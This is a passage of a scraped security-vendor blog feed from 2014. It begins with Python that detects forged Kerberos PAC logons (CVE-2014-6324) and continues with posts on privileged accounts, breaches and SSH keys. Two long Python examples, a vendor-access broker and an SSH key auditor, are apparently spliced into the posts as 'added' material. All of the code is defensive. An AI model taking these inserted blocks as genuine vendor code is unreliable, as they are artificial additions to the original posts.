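DIRECTORY = {
    "S-1-5-21-1004336348-1177238915-682003330-500": ("Administrator", True),
    "S-1-5-21-1004336348-1177238915-682003330-1106": ("jdoe", False),
    "S-1-5-21-1004336348-1177238915-682003330-1107": ("svc-backup", False),
}
NETBIOS_DOMAIN = "CORP"  # single-domain assumption for this example

# Constructed 4624/4634 events in the flattened "Field: value | ..." form that
# many log collectors emit for the Windows Security log.
SAMPLE_LOG = """\
EventID: 4624 | Computer: DC01.corp.example | Security ID: S-1-5-21-1004336348-1177238915-682003330-1106 | Account Name: jdoe | Account Domain: CORP | Logon Type: 3 | Authentication Package: Kerberos
EventID: 4624 | Computer: DC01.corp.example | Security ID: S-1-5-21-1004336348-1177238915-682003330-500 | Account Name: jdoe | Account Domain: corp.example | Logon Type: 3 | Authentication Package: Kerberos
EventID: 4624 | Computer: DC01.corp.example | Security ID: S-1-5-21-1004336348-1177238915-682003330-1107 | Account Name: svc-backup | Account Domain: CORP | Logon Type: 3 | Authentication Package: Kerberos
EventID: 4634 | Computer: DC01.corp.example | Security ID: S-1-5-21-1004336348-1177238915-682003330-1106 | Account Name: jdoe | Account Domain: CORP | Logon Type: 3
"""


def parse_event(line: str) -> dict:
    """Split one flattened event into a field dict."""
    fields = {}
    for chunk in line.split(" | "):
        key, _, value = chunk.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def check_logon(ev: dict, directory=DIRECTORY, netbios=NETBIOS_DOMAIN) -> list:
    """Reasons a Kerberos 4624 looks forged; empty list if it is consistent.

    The KDC trusts the PAC to say who the user is. When a forged PAC carries
    another principal's SID, the resulting logon event has a Security ID that
    the directory resolves to a different name than the Account Name field.
    """
    if ev.get("EventID") != "4624" or ev.get("Authentication Package") != "Kerberos":
        return []
    reasons = []
    sid, name = ev.get("Security ID", ""), ev.get("Account Name", "")
    entry = directory.get(sid)
    if entry is None:
        reasons.append(f"SID {sid} is not in the directory snapshot")
    elif entry[0].lower() != name.lower():
        reasons.append(f"SID {sid} resolves to {entry[0]} but Account Name is {name}")
        if entry[1]:
            reasons.append("resolved identity is privileged")
    domain = ev.get("Account Domain", "")
    if domain and domain.upper() != netbios:
        reasons.append(f"Account Domain {domain!r} is not the NetBIOS name {netbios!r}")
    return reasons


def scan(log_text: str) -> list:
    """(line number, Account Name, reasons) for every suspicious logon."""
    alerts = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = check_logon(ev)
        if reasons:
            alerts.append((lineno, ev.get("Account Name"), reasons))
    return alerts
```

In production the directory snapshot comes from an LDAP query rather than a literal, the events come from the domain controllers' Security logs (not from workstations, where the forged ticket is used but the mismatch is less visible), and the alert should fire on the first hit: one such event is enough to justify resetting the account and reviewing every group change and logon that followed it.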

Consider how the announcement of CVE-2014-6324 relates to another recent move by Microsoft, namely the purchase of Aorato. Aorato provided an advanced-persistent-threat detection service and firewall for AD, specifically calling out that “your entire organization is connected to and depends on Active Directory” and that AD is a significant source of exposure to advanced cyberattacks aimed at data theft. (While Aorato's services have been discontinued by Microsoft, we can assume that its technology will eventually be integrated into AD in some fashion.)

Next Steps

Taken more broadly, however, this vulnerability demonstrates the specific risks associated with relying on a single legacy black-box technology for authorization services. Nearly everyone runs AD because it’s an entrenched technology, and serves a number of functions fairly well. However, as you consider the evolution of your security and infrastructure choices going into 2015, hoping that no further bugs are found is not a viable strategy.

 

]]>
Cyber Threat Investigators Identify “Signature” of Most Dangerous Cyber Attacks https://www.cyberark.com/blog/cyber-threat-investigators-identify-signature-dangerous-cyber-attacks/ Wed, 19 Nov 2014 13:55:19 +0000 https://www.cyberark.com/blog//

By John Worrall

Organizations are under constant threat of attack, yet few truly understand how they’re being attacked until it’s too late. They find themselves knee deep in the post-attack forensics effort before they really understand how cyber attackers operate and how to defend against them. This has to change if we want to stem the tide of damaging cyber attacks.

This is why CyberArk assembled a coalition of some of the world’s most experienced and knowledgeable cyber attack investigators, who were willing to share what they have learned from years of experience. That experience can help us all better understand the strategies and tactics of our adversaries.  Armed with this information, we can mount a much more effective defense and detection program to stop attacks before serious damage to the business is done.

Published today, CyberArk’s inaugural threat report identifies the compromise and misuse of privileged accounts as a key signature across targeted cyber attacks and security breaches.

Developed in cooperation with Cisco Talos Security Intelligence, Deloitte Financial Advisory Service, Deloitte & Touche Cyber Risk Services, Mandiant (a FireEye company), the Advanced Cyber Defense team at RSA and the Verizon RISK Team, the report analyzed the forensic experiences of these companies as they investigated the world’s most serious security breaches.

The report covers a wide range of first-hand accounts, learnings and warnings from which to build more effective defenses – far too many for this blog post and I encourage you to read it for yourself. Taken together, the experiences of these threat response organizations clearly outline that the battleground has moved inside the network and the first thing attackers will do is look to steal and exploit privileged access.

It’s more important than ever that organizations change their mindset and start looking at privileged account security as the new first line of defense. Protecting the enterprise starts by locking down these ‘all access passes’ that enable attackers to traverse a network without hindrances, destroy evidence of their activities, and establish redundant access points and backdoors that make it nearly impossible to keep them off your internal networks.

We’ll be blogging more about the report in the coming weeks, however, you can read the full report now.  It is available for free here: www.cyberark.com/threat-report

]]>
Topics and Themes from Re:Invent https://www.cyberark.com/blog/topics-and-themes-from-reinvent/ Wed, 19 Nov 2014 14:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/topics-and-themes-from-reinvent/  

With Re:Invent behind us, we took a step back and looked at the entire set of conversations that we had while on the show floor and attempted to tease out some of the themes, trends, and topics that attracted the most attention.

We’ve posted previously about three of the major themes that drove the most interest and attention from the show in general; it was interesting to see how many of these came out in our booth discussions, as well.

What jumps out at us here is the high number of tool-specific conversations we had. Security, permissions, secrets management, and audit for Docker and Jenkins were all consistently brought up by visitors to the Conjur booth. As we demonstrated our new user interface and walked through the reporting functionality we’ve created, another major theme — using Conjur for audit and compliance — was brought up by the folks we were talking to.

We expect that creating a strong, audited, security-focused set of permissions and secrets management workflows will be an area of interest, more so now than ever before. Conjur can be used to support a variety of regulatory requirements (HIPAA, SOX, PCI-DSS, FISMA, NIST, and more); in doing so, it allows DevOps and IT teams to create a secure, cross-platform authorization platform that can quickly and comprehensively show all authz events and policy updates.

One other area of special interest coming out of the event was integrating Conjur with Docker. We are addressing this specifically on 11/25, at 1pm EDT – we’ll be doing a live setup of the system, and showing how to move secrets out of Docker containers and into Conjur.

There is still time to register for the session by clicking here.

]]>
AWS Re:Invent 2014 – Day 2 https://www.cyberark.com/blog/aws-reinvent-2014-day-2/ Thu, 13 Nov 2014 12:46:00 +0000 https://cyberarkvx2.wpengine.com/blog/aws-reinvent-2014-day-2/  

Halfway through the AWS Re:Invent 2014 conference, three major themes have emerged:

  • Software-defined infrastructure is real and is being used by organizations that would not have imagined “going cloud” even 2-3 years ago
  • The concept of perimeter is well and truly dead. With software-defined systems, your entire IT stack can be killed and rebuilt in minutes; security and risk models must either adapt to embrace a permissions/secrets/audit framework, or become irrelevant
  • Information security requirements aren’t changing; from regulatory compliance to protecting PCI and PII data, organizations need a coherent and cohesive security strategy for their modern(izing) infrastructure.

During Wednesday’s keynote, the AWS team announced a number of new features that demonstrate the importance of protecting sensitive data, systems, and access within AWS itself. Here at Conjur, we’re very excited to see more attention being paid to protecting the data, services, and environments that comprise what we call the “Modern Infrastructure”.

The threat surface that modern infrastructure exposes is largely defined by access and authorization considerations. From the moment that a user, host, microservice, or code element comes into existence, it is critically important that it be inventoried, granted identity, and assigned appropriate and well-audited permissions.

Encrypting information with strong key management is an important component in that Modern Infrastructure, and wrapping a program for managing encryption into a larger security initiative focused on monitoring, managing, securing, and auditing authorization and access is essential to ensuring that sensitive data is not inadvertently accessed or exfiltrated from these new environments.

We’d love to hear what you’re hearing, seeing, and doing within your organization. Come see us at booth K6 all day today!

]]>
Conjur Talks Authorization, Permissions, and Secrets at Re:Invent https://www.cyberark.com/blog/conjur-talks-authorization-permissions-and-secrets-at-reinvent/ Tue, 11 Nov 2014 12:03:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-talks-authorization-permissions-and-secrets-at-reinvent/  

Conjur will be on the show floor and in the Venetian, to talk about DevOps Security at AWS Re:Invent, discussing authorization, permissions, and secrets management for modern infrastructure!

Conjur allows enterprises to monitor, manage, secure, and audit highly automated and complex modern infrastructure. Backed by a strong permissions management and role-based access control model, Conjur allows information security, development, and operations teams to build access and authorization policies, manage and distribute secrets securely, and easily meet complete audit and compliance requirements.

Conjur will be showing off its authorization platform all week at booth K6 at the Venetian. In addition, CTO and co-founder Kevin Gilpin will be hosting two 2-hour hackathon sessions on site on Wednesday afternoon, demonstrating and helping teams secure their modern infrastructure environments without slowing down the pace of innovation and deployment. More details and registration information can be found here.

Additionally, Conjur staff will be on hand to show off the new Conjur Audit functionality, with its easy-to-view user interface and full authorization audit trail support. Attendees are encouraged to visit Conjur at Booth K6 to meet Conjur’s product and executive team, demo products, and enter to win an iPad Mini!

]]>
Former White House CIO Theresa Payton on Battling Cyber Threats https://www.cyberark.com/blog/former-white-house-cio-theresa-payton-battling-cyber-threats/ Tue, 11 Nov 2014 07:00:33 +0000 https://www.cyberark.com/blog//

By John Worrall

We’ve wrapped the 2014 CyberArk North American Customer Event and wanted to share some great insight that our guest keynote presenter shared. Former White House CIO, Theresa Payton, is a well-respected authority on internet security, net crime, fraud mitigation and technology implementation in the U.S. She has deep experience across both government and financial services industries, in addition to being the first woman to hold the position of White House CIO from 2006 to 2008.

Payton gave a candid, humorous presentation, discussing the current state of the cyber security industry, sharing some stories from her time at the White House. Throughout her presentation, Payton hit on a few key themes that every organization should take to heart.

Battling Cybercrime = Fighting Evil

Throughout discussions of cyber threats at the enterprise level, Payton continually reminded us of her view that fighting cybercrime is essentially fighting evil. While the security industry would hope its efforts are making a difference, I’m sure many of us in the industry would be hesitant to label ourselves as “fighters of evil.” Yet Payton’s argument makes sense. The money amassed through acts of cybercrime generally goes on to fund things like human trafficking, child pornography, gun-running and terrorism.

Payton discussed the growing cybercrime black market and its increased demand. She told a story about working with a private company whose website “disappeared,” only to discover it was being held for a half million dollar ransom in a country outside of the jurisdiction of the FBI. Her point was to pull our noses away from the daily grind of protecting company assets, reputation and customers, and look at the bigger impact of our jobs. As Payton pointed out, there is a concerted, well organized adversary out there that likely views each company as a piece of a larger goal, and that we as security professionals should not lose track of the greater good we do – it should serve as motivation.

We Need to Change the CEO Conversation

Payton told the story of a senior White House staffer coming to sit with her IT team. He bluntly asked, “So, tell me what you all are doing to make sure we don’t get hacked.” This is a common question many CEOs or board members ask of senior IT teams.

Payton thanked this particular senior staffer for his interest and invited him to sit in on a team exercise to practice their response to what could be considered an advanced persistent threat – someone hacking in and stealing the president’s schedule. Once the staffer was able to see first-hand the importance of being able to identify and respond to a breach, Payton pulled him aside. “The truth is, technology people are uncomfortable telling executives the truth – that everything is hackable,” she said. “Even when we break up into teams of good guys versus bad guys and hack ourselves, the bad guys always get in. You just can’t protect yourself 100 percent of the time. Better questions to ask your IT team are, ‘I know it’s inevitable, but what are you doing to prevent a breach? And what steps are you taking to handle a breach if it does occur? What can I do to help you?’ These questions open up an honest dialogue around the real challenges your security and operations team are confronting.” Educating senior executives is absolutely critical to defending against cyber attacks, and every organization would benefit from this process.

How Do You Measure Success in Security?

Before speaking with Payton, the senior staffer in the previous story probably would have defined her team’s success based on their ability to prevent 100 percent of breaches. But that’s not how Payton defines it. She believes it comes down to correctly identifying legitimate cyber threats, stopping breaches early and being able to find and push cybercriminals out of the network. We can’t stop every breach, but we can find them and contain them.

The bottom line is that the security industry needs to protect its most critical assets. Payton ended her talk by putting up a photo of a bike wheel secured to a pole. Clearly, the owner took steps to secure his property, however, did he manage to identify its most critical assets – whether that was its frame, its basket or its bell? Our security policies must focus on protecting the most important pieces of our business and more importantly, we must never underestimate our adversaries.

Given the significance of privileged accounts in every advanced attack, whether it’s Edward Snowden using a privileged account to pilfer secrets from the NSA, or a third-party contractor not properly managing privileged connections to a network as in the recent retail breaches, protecting your most critical assets hinges on privileged account security.

]]>
Your Last Line of Defense Should be Your Strongest https://www.cyberark.com/blog/last-line-defense-strongest/ Mon, 10 Nov 2014 18:18:40 +0000 https://www.cyberark.com/blog//

Bloomberg Businessweek recently reported that the global cost of cybercrime is more than $400 billion. That’s a hit we take every year – and industry experts say that’s a conservative estimate. Yet despite this reality, many organizations continue to focus the lion’s share of their time, effort and resources on security tactics that try to keep attackers out. In today’s world of advanced persistent threats, the ‘perimeter’ simply isn’t reliable.  It isn’t enough.

Motivated attackers – both malicious outsiders and stealthy insiders – are after something very specific: your Privileged Account Credentials. With these in hand, the attacker’s point of origin no longer matters and perimeter defenses are rendered useless. As a disguised insider, the attacker can move easily through your network, hijacking additional accounts and elevating privileges to gain access to vast stores of information, data and control within the organization’s digital repositories. And with legitimate credentials, permissions and workflows, the attacker will look just like a legitimate employee – enabling them to hide, undetected, for months – or even years – before attacking.

Attackers are finding new ways to pose as legitimate privileged users via third-party vendor access. According to the CyberArk 2014 Global Advanced Threat Landscape Survey, 60 percent of businesses now allow third-party vendors remote access to their internal networks, and of that group, 58 percent of organizations have no confidence that third-party vendors are securing and monitoring privileged access to their network. With the wave of highly publicized attacks on major retailers via remote contractors, it’s clear that attacks involving employees or third-party vendors pose an equally great risk to enterprise organizations.

The recent Snowden and Wikileaks revelations have brought insider threats to the forefront of the conversation and have shown the world that authorized insiders have the potential to do just as much harm as external attackers (and often, more harm). Insider threats – coming from both people who exploit legitimate access to an organization’s resources for malicious purposes and who unintentionally create vulnerabilities – were cited by more than 70 percent of information security managers as their biggest concern in a recent industry study. Dr. Phyllis Schneck, Deputy Under Secretary for Cybersecurity at the U.S. Department of Homeland Security, was recently quoted as saying, “Cybersecurity isn’t just about bits and bytes, it’s about managing people.” And in response to a growing number of insider threat cases, the FBI issued a warning to companies about the rise in attacks by current and former employees, noting these cyber attacks can cost an organization up to $3 million for each attack.

The battleground has shifted inside the network; therefore, it’s more important than ever that organizations make their last line of defense the strongest. CyberArk provides a critical cyber security layer inside the network perimeter to help you secure the heart of your enterprise.  It’s called Privileged Account Security. Check out this new, two-minute video to learn more.

Let’s face it: We may not know who “they” are, and we may not know when they’re coming, but we know what they’re after.  CyberArk can help.

]]>
Lessons from The Home Depot Breach https://www.cyberark.com/blog/lessons-from-the-home-depot-breach/ Fri, 07 Nov 2014 12:11:00 +0000 https://cyberarkvx2.wpengine.com/blog/lessons-from-the-home-depot-breach/  

Security researcher Brian Krebs published an article today that detailed how the Home Depot breach yielded up not only the usernames and passwords for their customer base, but also more than 50,000,000 email addresses.

Like the Target breach of 2013, it appears that the criminals got in through an escalation-of-privileges attack, using vendor credentials to gain illegitimate access to the company’s network, and then using that access to work their way up the food chain through a series of exploits and malware tools that were (apparently) custom-built to penetrate the Home Depot security perimeter.

Over the coming weeks, we expect to see coverage around that malware, its design and deployment, and how it was used to gain access to customer credentials and data. While the story so far is that no credit card (PCI) or personally identifiable information (PII) was gained, it may end up being the case that systems containing that kind of critically sensitive information were in fact accessed, especially if the attackers were deploying tools designed to do so.

Start at the Beginning

What’s important to note here is that the attack started with stolen credentials from a vendor. This was not a failure to manage a firewall properly, or a lack of security patches on a server — it was a compromised but valid secret (credentials) being used by someone who should not have had the authorization to do so.

This breach, like Target before it, underscores how important it is to have a security posture that is not exclusively focused on protecting against perimeter-based attack. Authz failures are often the simplest to execute: pose as a vendor or grab a username and password through social engineering, and you’re in. Unless you have a robust permissions and secrets management framework built into your infrastructure, it’s game over.

A better approach here might have been to layer in those secrets and permissions systems from day one. One model that would have worked:

  • Home Depot could have established a bastion host that authenticated vendors prior to gaining network access, with inspection of IP range and more robust (MFA) identification
  • Once authenticated, authorization could have been highly restricted, for example, via one-time token distribution into ephemeral storage with highly limited access rights, ideally through fully and immutably audited service broker systems that prevented any direct network access
  • Those authorization tokens and the originating credentials could and should have been rotated regularly, making it impossible to gain access with old data
  • All subsequent internal access should have been highly regulated, such that no escalation path existed for a vendor account under any circumstances
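The model just listed, as an added toy implementation in Python (this is not Conjur's or Home Depot's code): a bastion step that inspects the source range and requires MFA, one-time short-lived tokens held only in memory, a hash-chained audit log that breaks if any entry is edited, rotation that voids every outstanding token, and a policy guard that refuses administrative rights to a vendor account. The network ranges, vendor names and right names are constructed.

```python
"""Toy vendor-access broker for the model above (constructed example, not Conjur code).

Assumed conventions: the bastion checks the vendor's source address against an
allow-list and requires a successful MFA result; tokens live only in memory and
are redeemable once; every decision is appended to a hash-chained audit log;
rotation voids all outstanding tokens; vendor accounts can never be granted an
administrative right. Ranges, names and rights below are made up.
"""
import hashlib
import ipaddress
import json
import secrets
import time

VENDOR_ALLOWED_NETS = {"hvac-vendor": [ipaddress.ip_network("203.0.113.0/24")]}  # RFC 5737 test range
VENDOR_RIGHTS = {"hvac-vendor": {"read:hvac-telemetry"}}  # the only rights a vendor may hold
ADMIN_RIGHTS = {"admin:domain", "write:pos-network"}      # never grantable to a vendor account
TOKEN_TTL_SECONDS = 300


class AuditLog:
    """Append-only log; each entry commits to the previous hash, so editing or
    deleting an earlier entry breaks the chain (the 'immutably audited' part)."""

    def __init__(self):
        self.entries = []
        self._last = "0" * 64

    def record(self, event):
        body = json.dumps(event, sort_keys=True)
        digest = hashlib.sha256((self._last + body).encode()).hexdigest()
        self.entries.append({"prev": self._last, "event": event, "hash": digest})
        self._last = digest
        return digest

    def verify(self):
        prev = "0" * 64
        for e in self.entries:
            body = json.dumps(e["event"], sort_keys=True)
            if e["prev"] != prev or hashlib.sha256((prev + body).encode()).hexdigest() != e["hash"]:
                return False
            prev = e["hash"]
        return True


class Broker:
    def __init__(self, audit, now=time.time):
        self.audit = audit
        self.now = now          # injectable clock so expiry can be exercised deterministically
        self._tokens = {}       # token -> (vendor, expiry); ephemeral, never written to disk

    def authenticate(self, vendor, source_ip, mfa_ok):
        """Bastion step: source-range inspection plus MFA. Returns a one-time token or None."""
        addr = ipaddress.ip_address(source_ip)
        in_range = any(addr in net for net in VENDOR_ALLOWED_NETS.get(vendor, []))
        ok = in_range and mfa_ok
        self.audit.record({"t": self.now(), "ev": "auth", "vendor": vendor, "ip": source_ip,
                           "in_range": in_range, "mfa": mfa_ok, "result": ok})
        if not ok:
            return None
        token = secrets.token_urlsafe(32)
        self._tokens[token] = (vendor, self.now() + TOKEN_TTL_SECONDS)
        return token

    def redeem(self, token, right):
        """Authorize exactly one action; the token is consumed whether or not access is granted."""
        entry = self._tokens.pop(token, None)
        if entry is None:
            self.audit.record({"t": self.now(), "ev": "redeem", "result": False, "reason": "unknown-or-used"})
            return False
        vendor, expiry = entry
        if self.now() > expiry:
            reason = "expired"
        elif right not in VENDOR_RIGHTS.get(vendor, set()):
            reason = "not-granted"
        else:
            reason = None
        self.audit.record({"t": self.now(), "ev": "redeem", "vendor": vendor, "right": right,
                           "result": reason is None, "reason": reason})
        return reason is None

    def rotate(self):
        """Credential rotation: every outstanding token becomes unusable regardless of its TTL."""
        self._tokens.clear()
        self.audit.record({"t": self.now(), "ev": "rotate"})


def grant(vendor, right):
    """Policy guard: there is no escalation path for a vendor account, ever."""
    if right in ADMIN_RIGHTS:
        raise PermissionError(f"{right} cannot be granted to vendor account {vendor}")
    VENDOR_RIGHTS.setdefault(vendor, set()).add(right)
```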

Build Least Privilege In From Day One

The work that would have gone into this sort of system may appear daunting, but had Home Depot dedicated the effort before they were publicly hacked, they could have saved a tremendous amount of time and expense that’s now being dedicated to a (very embarrassing) response.

More importantly, consumer data would not have been stolen, and 50 million people wouldn’t have to keep an eye on their accounts for the foreseeable future, wondering if their information was being used illicitly. There are no indications of this so far, and with luck it won’t happen — none of us at Conjur are believers in fear as a sales tactic — but we do believe passionately in the importance of getting security right when you’re the custodian of your customers’ data.

Least privilege, separation of duties, and zero-trust networking aren’t just buzzwords. Isn’t it time to make them requirements for any modern network infrastructure?

]]>
2014 Security Breaches Report https://www.cyberark.com/blog/2014-security-breaches-report/ Thu, 06 Nov 2014 16:58:00 +0000 https://cyberarkvx2.wpengine.com/blog/2014-security-breaches-report/  

In 2013, “84 percent of CEOs and 82 percent of CIOs stated that they believed that their cybersecurity programs were currently effective” (source). 2014 security breaches, or at least those that were known about, rose 62% in comparison to the year prior.

More of the same isn’t working.

A security education vendor released an infographic this week that pointed out that the cybersecurity space is facing a dual challenge: there are simultaneously more advanced attacks taking place than ever before, but also fewer trained professionals who can address them, and downward pressure on the educational system that is supposedly training the next generation of InfoSec experts.

In 2014, the average detection times for advanced persistent attacks rose to just under eight months. The net cost to the US economy of known breaches rose to $3 trillion. In spite of this, 62% of organizations haven’t invested in cybersecurity training programs in 2014, at all; 1 in 3 security teams aren’t familiar with how to defend against advanced hacking attempts against their systems and organizations.

It’s a bleak picture.

Going into Battle with The Army You Have

In a sense, cybersecurity is a resource allocation problem. Addressing the risks requires a combination of understanding and minimizing the threat surface, building a robust and fault-tolerant detection and prevention system into your infrastructure, and ensuring that you have world-class audit and response mechanisms in place to minimize the time and cost of dealing with issues as they arise.

As infrastructure changes, the best practices for “baking in” security are also evolving. Over the course of the past few months, we’ve spent a significant amount of time working with our partners and customers on how to build out a strong security model for highly automated infrastructure. Three consistent themes have emerged from those discussions: the need for good permissions management, strong secrets storage and distribution, and robust audit and compliance.

In other words, a model is emerging for securing modern infrastructure:

]]>
DevOps Hackathon: Conjur at AWS Re:Invent 2014 https://www.cyberark.com/blog/devops-hackathon-conjur-at-aws-reinvent-2014/ Mon, 03 Nov 2014 10:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/devops-hackathon-conjur-at-aws-reinvent-2014/  

Are you heading to AWS Re:Invent 2014, in Las Vegas? Conjur is!

We’re going to be set up at booth #K6, talking about DevOps, security, and how to monitor, manage, audit, and secure modern infrastructure. Come stop by; we’ll also have our much-asked-after LDAP t-shirts on hand for anyone who says hello.

We’re also tremendously excited to be hosting the first Conjur Hackathon, led by our own Kevin Gilpin (CTO and founder). We have a fantastic suite rented at the Venetian (the hotel that the event is at), and on Wednesday we’ll be opening it up in two 2-hour blocks for anyone who is interested to install, implement, and hack on Conjur with Kevin.

We’ll have light refreshments on hand, and can’t wait to see what the community comes up with. Space is limited, of course — sign up here: http://www.conjur.net/conjur-aws-reinvent-hackathon/

]]>
Microsoft PowerPoint – Presenting an APT Privileged Pathway https://www.cyberark.com/blog/microsoft-powerpoint-presenting-apt-privileged-pathway/ Fri, 31 Oct 2014 13:09:08 +0000 https://www.cyberark.com/blog//

By Yossi Dantes

Microsoft PowerPoint is one of the most popular collaboration applications in the world of business – it’s also the latest pathway external attackers are taking to steal privileged accounts and launch advanced attacks.

Microsoft recently issued a temporary security fix for a zero day vulnerability that impacts every Microsoft OS except Windows Server 2003. The exploit allows attackers to launch targeted attacks using malicious PowerPoint documents sent in phishing emails.

According to the security bulletin, the vulnerability “resides within the OS’s code that handles OLE (object-linking and embedding) objects. The vulnerability is triggered by opening a PowerPoint (or any MSFT Office file) containing a malicious OLE object. Once triggered, attackers can gain the same user rights as the current user – including administrative and privileged user rights.”

Stealing and exploiting this level of access is critical for hackers to carry out their attacks.  Once the attacker gains this privileged foothold, they can elevate privileges to move about the network to conduct reconnaissance on the security architecture, identifying the systems they need to avoid to perpetrate their attack. Once this insider knowledge is gained, they can easily infiltrate systems and exfiltrate data. This level of insider/privileged access is the key on which all advanced attacks turn.  We’ve seen this time and again.

While this vulnerability is specific to Microsoft, the reality is that no OS is safe. The Shellshock vulnerability was specific to Unix systems. DARPA, the research arm of the Department of Defense, recently highlighted similar vulnerabilities in Apple Inc.’s OS X operating system. Security is not dependent on which OS you use – it’s dependent on how your organization is managing its privileged accounts.

Whether it’s through an OS zero day vulnerability, a phishing email, or any other perimeter tactic, attackers will get inside your organization, they will target privileged accounts, and if they’re successful, the chances are high that you will suffer a debilitating security incident.

This is why a least privileged approach on all servers and desktops is vital to securing any organization.  With a least privileged approach to security, attackers may get in, but they will not be able to get the administrative rights necessary to access the critical organization assets. This is an absolutely necessary step in any targeted attack. Preventing this level of access can help an organization stop a targeted attack before it starts.

This is why CyberArk created the On-Demand Privileges Manager (OPM) – to help our customers enforce ‘the principle of least privilege’ and lock down administrative accounts. With OPM, users can use their named accounts with standard user permissions, elevating themselves to execute commands and applications on a need basis (and based strictly on company policy). This allows all users to have the privileged access they need to do their jobs, without compromising the security posture of the entire organization.  This helps stop advanced attacks reliant on privileged exploitation early in the kill chain.

No matter what OS you’re using, applying and enforcing policy securing privileged accounts is critical to protecting your organization against the latest advanced threats.

]]>
Prevent Permanent, Unfettered Access to Critical Systems by Rotating SSH Keys https://www.cyberark.com/blog/prevent-permanent-unfettered-access-critical-systems-rotating-ssh-keys/ Thu, 30 Oct 2014 09:15:20 +0000 https://www.cyberark.com/blog//

By John Worrall

IT staff come and go – normal attrition, ending of a contract, switching providers – however, the millions of SSH keys they created while on the job live forever…unless you have a way to discover what keys still exist and manage them properly. SSH keys are an essential tool that IT rely on to do their job so they need to be secured like any other privileged credential.

One of the critical features of our Privileged Account Security Solution v9 release is proactive SSH key rotation, which focuses on eliminating the risk of permanent backdoors that lead directly to critical systems. Just like other privileged credentials, SSH keys are often created and then forgotten about.

Case in point – a colleague was recounting a story of a past job change where he left his former employer with thousands of SSH keys and was never asked to turn them over or kill them outright! They did eventually ask for a full list of keys… however, shutting them down was going to be a manual process.

While this is an extreme example of how SSH keys can be mishandled across organizations, it illustrates the potential security risk posed here. Just think about how often IT staff leave to go work for a competitor. A more common scenario is that IT staff typically store private SSH keys on their desktops or laptops. If one of their vulnerable endpoints were to become compromised, a targeted attacker could locate the private key, steal it and use it to advance an attack against the organization. As a result, SSH key rotation is a necessary part of every security strategy.

The prospect of frequently rotating a million keys can be daunting. Fortunately, once the SSH keys are consolidated under one central management system, this can be managed automatically, pushing out all new SSH keys with just one click of a button.
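The discovery step described above, as an added Python example (not CyberArk's code): an inventory over authorized_keys contents already collected from a fleet that fingerprints each key the way OpenSSH prints it (SHA256 form) and flags keys owned by departed staff, keys with no owner comment, keys lacking a `from=` source restriction, deprecated key types, keys shared across hosts, and entries whose declared type does not match the key blob. The hostnames, key material, owner convention and departed list are all constructed.

```python
"""Inventory of authorized_keys entries collected from a fleet (constructed example,
not CyberArk's code). Assumed conventions: a key's comment carries its owner as
user@something; a 'from=' option is the required source restriction; a set of
departed logins is available. Hosts, key material and names below are made up.
"""
import base64
import binascii
import hashlib
import struct
from collections import defaultdict

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")
DEPRECATED_TYPES = {"ssh-dss"}   # disabled by default since OpenSSH 7.0


def _split_options(line):
    """Split an entry into (options, rest); options may hold quoted strings with spaces."""
    if line.split(" ", 1)[0].startswith(KEY_TYPE_PREFIXES):
        return "", line
    quoted = False
    for i, c in enumerate(line):
        if c == '"' and (i == 0 or line[i - 1] != "\\"):
            quoted = not quoted
        elif c == " " and not quoted:
            return line[:i], line[i + 1:]
    return line, ""


def parse_entry(line):
    """Return declared type, type embedded in the blob, OpenSSH-style SHA256 fingerprint, options, comment."""
    options, rest = _split_options(line.strip())
    parts = rest.split(None, 2)
    if len(parts) < 2:
        raise ValueError("not an authorized_keys entry")
    blob = base64.b64decode(parts[1], validate=True)
    (n,) = struct.unpack(">I", blob[:4])          # wire format: string(type) || key material
    fp = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    return {"options": options, "type": parts[0], "embedded_type": blob[4:4 + n].decode("ascii", "replace"),
            "fingerprint": "SHA256:" + fp, "comment": parts[2] if len(parts) == 3 else ""}


def audit_keys(hosts, departed):
    """hosts: {hostname: [lines]} -> one dict per key with a 'findings' list (empty = clean)."""
    hosts_by_fp, entries = defaultdict(set), []
    for host, lines in hosts.items():
        for line in lines:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            try:
                e = parse_entry(line)
            except (ValueError, struct.error, binascii.Error):
                entries.append({"host": host, "raw": line, "findings": ["unparseable"]})
                continue
            e["host"] = host
            hosts_by_fp[e["fingerprint"]].add(host)
            entries.append(e)
    for e in entries:
        if "fingerprint" not in e:
            continue
        f = []
        if e["type"] != e["embedded_type"]:
            f.append("type-mismatch")            # declared type disagrees with the blob
        if e["type"] in DEPRECATED_TYPES:
            f.append("deprecated-type")
        if not e["comment"]:
            f.append("no-owner")                 # nobody to ask whether it is still needed
        elif e["comment"].split("@")[0] in departed:
            f.append("departed-owner")           # the 'left the company' case from the post
        if "from=" not in e["options"]:
            f.append("no-source-restriction")
        if len(hosts_by_fp[e["fingerprint"]]) > 1:
            f.append("shared-across-%d-hosts" % len(hosts_by_fp[e["fingerprint"]]))
        e["findings"] = f
    return entries


def make_blob(ktype, material):
    """Build a syntactically valid key blob from dummy material (not a real key)."""
    s = lambda b: struct.pack(">I", len(b)) + b
    return base64.b64encode(s(ktype.encode()) + s(material)).decode()


ED_A, ED_B = make_blob("ssh-ed25519", b"\x01" * 32), make_blob("ssh-ed25519", b"\x02" * 32)
DSS, ODD = make_blob("ssh-dss", b"\x03" * 20), make_blob("ssh-ed25519", b"\x04" * 32)
SAMPLE_HOSTS = {   # constructed authorized_keys contents
    "db01": ['from="10.0.0.0/8",no-port-forwarding ssh-ed25519 ' + ED_A + " alice@laptop",
             "ssh-ed25519 " + ED_B + " bob@contractor",      # bob has left; no from= restriction
             "ssh-dss " + DSS],                               # no comment, deprecated type
    "web01": ["# managed by config management",
              "ssh-ed25519 " + ED_B + " bob@contractor",     # same key as on db01
              'command="/usr/bin/backup --full" ssh-rsa ' + ODD + " backup@db01"],  # mislabelled blob
}
DEPARTED = {"bob"}


def findings_for(results, host, comment):
    return next(e["findings"] for e in results if e.get("host") == host and e.get("comment") == comment)
```

Running `audit_keys(SAMPLE_HOSTS, DEPARTED)` gives the departed contractor's key three findings on each host it appears on, while Alice's restricted key comes back clean.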

